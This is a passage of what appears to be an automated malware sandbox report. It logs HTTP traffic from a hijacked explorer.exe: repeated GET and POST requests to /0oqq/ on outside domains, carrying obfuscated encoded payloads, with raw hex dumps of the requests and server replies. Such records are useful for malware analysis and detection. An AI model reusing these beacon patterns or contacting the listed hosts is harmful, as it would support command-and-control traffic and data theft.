Jb5ct1afWbPkGSaZku6YnL4B7UwOOIMG9-iMbdgN2vOJkji4FdS1JGco08jDTFlZZDhJKFAvXBMXVMZMMjlm8rZDaTbGDeRh2LrD14rQ7pEkh1FGOYsnLnlAU20XF5tlk5sxZ2913ljrRzP6okev1jm00uMDe4(aNw0ZdEl-PnhLAjzMIk0Xjn6Ig5j7o9Y4fZV76WWfD6wfZUDMJV06NZ7555~o9ntjWe(JjLqxFy4qHPmuaQ9g(S0epPNyOmtrlKSMczRpT7h4jXw3qpHMbZz6rBmtAHvbRsyAt_5MluUU8wxvooaf1ZChRsO8mRKnvrzGH7nZJBS0N9hwdH7Tvws8DvZyDMTIHlN5vtPArchrAqdlYyC4PQtjGLim89PqhF1cTr3I3GeMVrkC9oFkjt4t7WgVf_RFXuCjns1pn1WtyfeL1NxqyCj1YHtslnsTrBKyrVgJrzPLwAc_A5lMueviCNR5VLSH~4jGepB1ljDC1CZDeijQafIxizb6gCIJzqfD65wHcUiYnselXztnD37zTzZHPZxJDWdOYPaZed7U~UvLH_bmxmoA6twVT08OpTw2WxszWQd9dMSjCorLuvS3ME9FhUUN4axGsEHmIF99aXj7CHY1sQN1eNt6CPS-4Zf6ZaNnv9wF3nS2c90ohDJWHHJZ9f01jEdtNLF53U2R53bACuRu6cgiVDydzlY1PcwR7R2qU6tILR3uFlDCgMrVeAgm7ZgR5Mw1VRPlScR6i0TKHhd1Q79qoSveNUFt9MF-bi8gNxNnUJedCr~-pHbVYuv08XEQXhLuXaJQUcWrBidQKOX2aJ6F~GDN3Jnvok8KZdAlAwhsipHcr4uSkQct~eY4k2HIyP0anz1xkkv7JqpQ7d9R1I6vPNwBLwjhm2HwtfM5XkX_5cXBK_hqX0gqS8XhncWfev6h(I6XS_t_4LuLr6dKu1fnQvsBSjCPBSrEyZLrTYIpjMgz37vhDiUo5VfaZXHR6bIRGKTkIa(V2toTlW(aLQS3~LgVhEGKYPtnnacPws20IiHtteqri1F9WkQcbwwPj0d5no83RJ7Z6Lb3uK74NsyfvhfAIa07V-yyNU8zemaeCDj1PriIBrv4qdoUCx03QHhDMFZ5WqaoWAOJIerv6DyFm0dPaTBfTVC2(c(a56u6OI4dIhhP3qM4W658oRcEyizM8cZwsTRnA4IleyZPaRSvr81Z7vz0Uw(2RhlteuiOkHGzMKYPG9Dq1VddmcoWS51_MYV-77uj5KEHpD7JkBCts8W6NFZL2SquKyoICPDNp7D8n1yq0T~ATCBEq9w3Bl63bR6aUR4F0oa6XWOhDyDusO(njqCbAq5mvzrAv7kxqpulQcC76HrheG1yuOKEfYv56gpPZ9~Rz_uQSVtY~LwRcGh_L2mc1Z2ppAzBbbTmeOsS3lCIWBjsc5PuwRxItoo6yG6-MpADEZwohwxC(oH7ATlnIb2l7DIqeNAgL8PCnPIS8y510Tks99nG9BcQN7oYVpOTIvhzfdZgKTwUnaqDlGJs3vwCwcsjmSlOEQmMqIk6RI9pgHHXC3O8Kyfp5XrWfnnw5JPBOaAR0_VwCDHhYOFvQQLyQFq6OzsUgmS0dBM9buBqkziSikRV0eBqb5AEbwxpr6U1qnFTcQH_67tmtl7XKjR27ihNr-Zb4XHFxOn-0Dc_IQCJIAojB_GWZjcJug8nDTxIYwspQWqDw4LFTeT4U53hEJoVrt06KwbxSO34tntp5yK66zvkMC3GF48h3RY_C9lLkYKB7uNzXH567985fp6pXluftXwui6ldjTYkIajUCFNl0RgYn3sBecow4GD8213O1jgFF4DZr4c7E_wXWbO8lmq5(y3baxgp1hDXvcH4nq9Kjy2b(bBAPitC4RxGuPlEImu3kGBjaokLV7y8vm
                                                                                                                      Mar 20, 2023 09:11:29.319060087 CET353INHTTP/1.1 403 Forbidden
                                                                                                                      server: openresty/1.13.6.1
                                                                                                                      date: Mon, 20 Mar 2023 08:11:29 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 175
                                                                                                                      x-fail-reason: Bad Actor
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      39192.168.2.349738198.58.118.16780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:11:31.846594095 CET354OUTGET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1
                                                                                                                      Host: www.virginhairweave.co.uk
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:11:31.989573002 CET354INHTTP/1.1 403 Forbidden
                                                                                                                      server: openresty/1.13.6.1
                                                                                                                      date: Mon, 20 Mar 2023 08:11:31 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 175
                                                                                                                      x-fail-reason: Bad Actor
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      4192.168.2.3497035.181.216.14180C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:08:55.351131916 CET146OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.dirdikyepedia.com
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.dirdikyepedia.com
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.dirdikyepedia.com/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 43 54 34 69 37 44 66 32 4d 59 41 6c 70 46 45 77 4f 66 44 41 6f 67 75 42 6d 5a 48 65 61 71 79 7a 50 69 4c 4d 59 43 74 6b 46 66 6e 54 5a 7a 76 6b 72 6f 5a 79 62 48 6c 6b 42 39 76 43 53 38 77 63 42 6c 67 75 6d 61 54 73 30 6b 6c 47 51 68 4a 4d 61 52 36 4b 6f 54 75 6b 42 71 43 4e 30 4b 38 47 71 2d 58 34 59 2d 6d 77 71 6d 59 4f 35 39 68 6a 66 4c 46 74 41 4d 4c 42 37 32 4b 30 54 6d 31 78 46 5f 62 35 39 75 4a 66 6b 47 65 4b 64 43 7e 49 63 6d 76 59 65 79 48 6b 32 71 38 43 55 6e 4e 4f 39 61 64 71 59 66 53 4d 4c 4b 33 4f 38 2d 71 35 64 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=CT4i7Df2MYAlpFEwOfDAoguBmZHeaqyzPiLMYCtkFfnTZzvkroZybHlkB9vCS8wcBlgumaTs0klGQhJMaR6KoTukBqCN0K8Gq-X4Y-mwqmYO59hjfLFtAMLB72K0Tm1xF_b59uJfkGeKdC~IcmvYeyHk2q8CUnNO9adqYfSMLK3O8-q5dg).
                                                                                                                      Mar 20, 2023 09:08:55.518115997 CET148INHTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 1238
                                                                                                                      date: Mon, 20 Mar 2023 08:08:55 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      x-powered-by: Niagahoster
                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                      x-content-type-options: nosniff
                                                                                                                      vary: User-Agent
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border
                                                                                                                      Mar 20, 2023 09:08:55.518137932 CET148INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65
                                                                                                                      Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Te


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      40192.168.2.3497395.181.216.14180C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:11:53.384625912 CET356OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.dirdikyepedia.com
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.dirdikyepedia.com
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.dirdikyepedia.com/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 43 54 34 69 37 44 66 32 4d 59 41 6c 70 46 45 77 4f 66 44 41 6f 67 75 42 6d 5a 48 65 61 71 79 7a 50 69 4c 4d 59 43 74 6b 46 66 6e 54 5a 7a 76 6b 72 6f 5a 79 62 48 6c 6b 42 39 76 43 53 38 77 63 42 6c 67 75 6d 61 54 73 30 6b 6c 47 51 68 4a 4d 61 52 36 4b 6f 54 75 6b 42 71 43 4e 30 4b 38 47 71 2d 58 34 59 2d 6d 77 71 6d 59 4f 35 39 68 6a 66 4c 46 74 41 4d 4c 42 37 32 4b 30 54 6d 31 78 46 5f 62 35 39 75 4a 66 6b 47 65 4b 64 43 7e 49 63 6d 76 59 65 79 48 6b 32 71 38 43 55 6e 4e 4f 39 61 64 71 59 66 53 4d 4c 4b 33 4f 38 2d 71 35 64 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=CT4i7Df2MYAlpFEwOfDAoguBmZHeaqyzPiLMYCtkFfnTZzvkroZybHlkB9vCS8wcBlgumaTs0klGQhJMaR6KoTukBqCN0K8Gq-X4Y-mwqmYO59hjfLFtAMLB72K0Tm1xF_b59uJfkGeKdC~IcmvYeyHk2q8CUnNO9adqYfSMLK3O8-q5dg).


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      5192.168.2.3497045.181.216.14180C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:08:58.038130045 CET154OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.dirdikyepedia.com
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.dirdikyepedia.com
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.dirdikyepedia.com/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 43 54 34 69 37 44 66 32 4d 59 41 6c 6f 6c 55 77 4d 35 4c 41 39 51 75 4f 70 35 48 65 50 36 79 33 50 69 48 4d 59 44 5a 4f 46 70 58 54 5a 69 28 6b 72 4f 4e 79 5a 48 6c 6b 56 4e 76 4f 57 38 78 48 42 6c 30 49 6d 66 33 38 30 69 56 47 52 33 4e 4d 61 78 36 4a 33 6a 75 6c 4e 4b 43 4f 35 71 38 47 71 2d 4b 5a 59 2d 4b 4b 71 6e 67 4f 35 4c 31 6a 66 4a 73 37 41 63 4c 41 35 32 4b 30 54 6d 70 71 46 5f 61 4f 39 75 77 59 6b 47 7e 4b 63 55 43 49 62 33 76 48 61 69 48 6a 36 4b 39 47 65 45 63 2d 7a 5a 52 64 57 38 61 47 45 50 69 70 31 75 28 6c 42 66 6c 38 61 58 53 64 46 31 66 4a 56 44 49 51 70 38 70 58 36 75 4b 71 30 33 50 44 39 47 76 6d 6c 4a 39 6a 5a 75 73 42 7e 67 4b 34 51 61 78 41 47 32 72 57 42 72 73 38 33 38 46 6d 43 32 43 70 6a 5a 73 78 73 75 4c 77 54 64 73 39 66 52 47 64 73 45 54 45 41 69 72 56 50 41 61 34 36 34 6f 51 71 66 4e 4c 50 5a 52 65 55 73 74 32 7a 74 61 70 67 4a 6a 6c 78 61 39 41 45 6b 66 62 4c 72 77 64 52 39 77 6e 6e 53 76 70 43 4d 4a 7a 39 33 49 67 32 63 35 6d 76 4a 64 55 61 5f 4a 69 64 32 33 78 65 6d 70 4a 74 5a 48 44 65 73 44 5f 57 49 53 75 68 6f 76 57 34 70 74 39 48 5a 4d 57 4d 2d 64 71 65 68 63 31 74 44 75 55 49 2d 66 33 30 2d 58 79 77 43 6f 6c 55 5a 58 39 66 31 59 4d 73 36 4a 39 78 4a 65 38 54 54 31 5f 6f 71 75 41 52 34 78 69 44 47 6b 55 4a 41 6f 54 59 30 46 70 58 79 31 72 4e 44 39 4e 73 45 36 64 7e 68 73 61 41 76 59 45 71 5f 6b 5a 35 70 46 32 56 57 66 4e 37 38 6d 48 48 31 70 73 59 7a 74 53 59 5f 53 4d 4a 72 57 52 74 47 70 54 44 55 6e 50 4c 72 75 46 36 48 5a 43 31 36 61 4f 51 51 42 52 74 55 63 62 62 41 65 2d 79 56 49 69 61 5f 50 6a 76 75 39 67 37 50 52 53 74 74 53 48 6a 51 33 71 41 37 6f 72 39 65 73 55 52 6f 68 63 76 66 64 47 6d 50 54 31 31 43 6e 4d 64 47 43 76 32 4b 4a 5f 33 47 64 66 35 68 66 49 63 41 62 6c 42 2d 36 76 51 39 47 6a 74 38 54 41 44 58 44 39 34 4b 54 36 47 77 42 4a 50 53 77 52 45 79 45 72 76 63 51 66 63 6b 7a 5a 6c 2d 6f 62 35 6f 50 78 38 58 73 4e 37 65 71 53 39 48 67 74 6d 36 57 58 69 78 74 50 36 74 37 32 75 33 79 73 73 7a 59 4f 73 38 4e 78 39 6f 41 78 30 79 41 31 33 53 45 42 39 33 74 76 69 79 41 72 33 57 54 4c 34 6f 7e 75 39 75 6e 34 49 32 4c 57 72 66 4b 49 55 30 58 70 78 59 39 77 72 32 4f 30 6f 4b 38 31 63 75 66 6a 74 50 39 71 7e 74 73 50 33 33 6c 36 55 46 79 43 66 66 66 32 74 54 77 37 69 35 54 56 6e 30 7e 53 6c 58 6a 45 66 32 5a 39 79 61 73 52 70 32 55 61 37 35 56 76 4d 6e 65 47 55 6c 78 66 76 35 59 78 62 30 76 78 78 4d 4e 72 34 6b 32 57 32 44 6e 74 46 6a 59 36 4b 65 61 59 56 73 71 6a 6e 42 5a 4e 6e 6e 6d 2d 44 71 58 62 6e 71 39 4e 4b 59 57 5a 67 4c 4e 77 6c 73 30 65 47 32 75 2d 71 71 58 50 48 44 4a 65 75 5f 70 6b 79 45 38 6e 45 4b 72 77 7a 6c 4e 6d 78 54 57 64 50 63 37 58 36 5f 4b 36 74 6b 53 69 4c 34 50 6f 70 76 61 75 37 75 37 41 76 6d 4a 6d 52 76 31 33 48 33 79 45 41 35 79 4a 56 59 73 4c 59 4d 62 56 54 79 57 70 49 42 42 4f 67 58 64 71 45 42 4f 62 32 64 47 33 7e 38 54 32 55 62 4a 72 7a 5f 4f 35 76 6f 70 5a 62 4e 6c 50 43 38 31 6f 47 48 5a 64 48 54 74 46 53 51 67 4e 7a 43 73 4c 51 5a 78 65 69 65 7e 5f 57 42 52 34 7a 6c 41 48 28 45 69 75 48 65 33 30 66 63 7e 61 7e 2d 54 75 6a 6d 7e 38 63 36 5a 54 6f 52 4f 43 45 43 72 37 34 5a 73 76 49 4d 7a 65 6b 49 76 4e 4f 36 75 62 70 5a 4d 57 70 56 54 78 31 4f 4d 30 32 4e 49 45 42 6c 65 48 7a 4d 62 44 35 47 4f 68 37 30 76 2d 67 33 39 65 48 56 66 48 46 70 52 30 34 66 65 30 37 75 5a 66 49 50 57 71 53 6a 32 31 78 7a 49 65 68 31 6a 6f 58 76 53 4f 68 46 4f 61 44 48 64 6b 36 59 61 33 38 44 71 46 4b 6d 50 4e 41 6b 6f 72 66 79 53 73 56 52 56 6a 58 4e 76 59 64 66 48 6c 7e 6c 65 64 34 64 63 63 52 6f 74 76 6b 72 6e 48 38 45 39 64 6e 32 4e 35 32 6b 70 48 5a 62 62 56 43 64 4c 44 46 43 74 65 5a 66 52 4f 30 33 58 47 41 30 71 7a 47 79 65 73 4a 50 30 74 68 64 68 42 52 2d 67 77 55 64 6b 45 73 6e 6f 35 54 5a 71 76 57 43 67 72 7a 44 58 6c 73 69 76 35 79 46 4e 43 61 4a 52 59 30 43 4e 54 30 48 62 30 36 59 77 65 68 37 53 57 61 42 4c 54 28 34 49 68 4d 44 46 45 6f 31 39 47 52 2d 50 6d 69 63 4a 4a 34 69 54 6f 70 38 53 79 55 50 5a 34 53 50 54 31 69 50 6c 34 51 7a 62 6b 6a 45 37 51 79 72 4f 38 6f 39 37 50 59 51 31 45 48 57 70 6a 61 59 30 54 56 72 61 56 6c 73 4b
                                                                                                                      Data Ascii: ICHyvj5=CT4i7Df2MYAlolUwM5LA9QuOp5HeP6y3PiHMYDZOFpXTZi(krONyZHlkVNvOW8xHBl0Imf380iVGR3NMax6J3julNKCO5q8Gq-KZY-KKqngO5L1jfJs7AcLA52K0TmpqF_aO9uwYkG~KcUCIb3vHaiHj6K9GeEc-zZRdW8aGEPip1u(lBfl8aXSdF1fJVDIQp8pX6uKq03PD9GvmlJ9jZusB~gK4QaxAG2rWBrs838FmC2CpjZsxsuLwTds9fRGdsETEAirVPAa464oQqfNLPZReUst2ztapgJjlxa9AEkfbLrwdR9wnnSvpCMJz93Ig2c5mvJdUa_Jid23xempJtZHDesD_WISuhovW4pt9HZMWM-dqehc1tDuUI-f30-XywColUZX9f1YMs6J9xJe8TT1_oquAR4xiDGkUJAoTY0FpXy1rND9NsE6d~hsaAvYEq_kZ5pF2VWfN78mHH1psYztSY_SMJrWRtGpTDUnPLruF6HZC16aOQQBRtUcbbAe-yVIia_Pjvu9g7PRSttSHjQ3qA7or9esURohcvfdGmPT11CnMdGCv2KJ_3Gdf5hfIcAblB-6vQ9Gjt8TADXD94KT6GwBJPSwREyErvcQfckzZl-ob5oPx8XsN7eqS9Hgtm6WXixtP6t72u3ysszYOs8Nx9oAx0yA13SEB93tviyAr3WTL4o~u9un4I2LWrfKIU0XpxY9wr2O0oK81cufjtP9q~tsP33l6UFyCfff2tTw7i5TVn0~SlXjEf2Z9yasRp2Ua75VvMneGUlxfv5Yxb0vxxMNr4k2W2DntFjY6KeaYVsqjnBZNnnm-DqXbnq9NKYWZgLNwls0eG2u-qqXPHDJeu_pkyE8nEKrwzlNmxTWdPc7X6_K6tkSiL4Popvau7u7AvmJmRv13H3yEA5yJVYsLYMbVTyWpIBBOgXdqEBOb2dG3~8T2UbJrz_O5vopZbNlPC81oGHZdHTtFSQgNzCsLQZxeie~_WBR4zlAH(EiuHe30fc~a~-Tujm~8c6ZToROCECr74ZsvIMzekIvNO6ubpZMWpVTx1OM02NIEBleHzMbD5GOh70v-g39eHVfHFpR04fe07uZfIPWqSj21xzIeh1joXvSOhFOaDHdk6Ya38DqFKmPNAkorfySsVRVjXNvYdfHl~led4dccRotvkrnH8E9dn2N52kpHZbbVCdLDFCteZfRO03XGA0qzGyesJP0thdhBR-gwUdkEsno5TZqvWCgrzDXlsiv5yFNCaJRY0CNT0Hb06Yweh7SWaBLT(4IhMDFEo19GR-PmicJJ4iTop8SyUPZ4SPT1iPl4QzbkjE7QyrO8o97PYQ1EHWpjaY0TVraVlsKPTgLNFL0-Ey2cyHhqVqJAyloBZ5rHk6D6gi6qHA8EDf6YNDW6BWJot_KeSqHYxqjy6X0ZcJ6gvuIj0KDp0L0QzY3z~Xj6sDhBS4Hnvq1RSL5nZHXI5BbisvQEEYIIqpsDz9SIlm1se8pZT_TlLBnDa4SpI_(YYD7NYmK6x_Ay5BFNE8qYo5Bnow(aSWhNR7ARr5UddcaHsFrxbVxvoIUKjX1c5n215gxYMWJ8n9xux7uJL0~bOpeyKR31qXit4g5l0vXttdBin7q-8TRbKHe8md2a0abecxqpYwIkumpJyHh70ezan7rq2vAcWooEIkGywnOOz1TMCrUoM0~DAW6-HWHOKKWqe1YY9N5qOeXaFcuOPDP2~5JRS2Y16AY85tVS7bOCullg~2qqUsq1OR5kqHos1UYFXJd_Zc7duzfBGVRpkUqtQAwawzh3c1lZ6xnpOPz7ysajcWwdGb6aZuQ4CrZCceNtV6(vJetOFtbSCBDtlWh_v7NvySA8pNFdutM467Hb3Ovf7UEOeAi_KSxw2003lXJCh7bspC22B8hoWRLRj0gm5-61FORVhdRqNGbIUJtCEmG-j6s4zXo2wt0X1JAKA3veSGAbiJIMrNHLYtuttzaB5JORcuKRarNieML0rZr9dbP1R-J3jPOPnbRD~aozU_TO7Jwh10~BbOJqyU14PPlXqITLrfBglCsz1PGKAVvhtPo4hceIgdZ3N3plYzW4mttoS9kyWCmNmeNHxuC8UW2alwAdDb5sBZ3a8-YehnxjgDrHtFb0RqvN8fB92X2aUr1YxRNAUK4qldBSmZnX~Eb8S1PTRTHBafYgqP7hBWoQxPWABWUKhoH6uoN-s19KoR4SE67c4ffX3DiSxISnahYwLXRc0UC1cVIm90bisn8IJp5RizhX7UH6tmxP8Gyic5xYcr9wqXoH0Rj9t_D8oRsbKvXkOmgN1_hMpqHmzmxxi2ttNR1SNEVqhFUIgKhcBaMA8D5N12cn02IQNCkU7e9pE77FeUYZBy(EoTaZoraPXKuyuSqoWQ8KtXhCvxgYuhcYDtB5CDC1DxRSomQszhu0GGeuXMno20xBrErboFCX9hQZJztKiBw50noOdSzpe8Nc5w82itjJ3XtTPRfszq2hBYEKnQn0l1o1iXOFJcZefpTXZ2EnwvJqoqtV9aOqlAXCH-gVoA(VqTVvmXNwyYC9eSbpQZYBANucJM5IvS2nrkos(1lylHNTiAZ66Xb07rLaNuRqG-DVnB(f(l6zzJye0Pwk8uYbR9~OLUuLaq59DzYYZ3inViZrSe1Uz-0Of96JJ9t_(kcnLDV3(FgSbxF7yIjRL6NPg3W5MpvoLw42KAO6oleQlzveMtNOSaolWPGN52uqnkT47DjrcSltupeYka3XW24Cw5DcoZxuc5Sq2K1xrDEIDgdoA-9H0-~vXj8mgAp2LH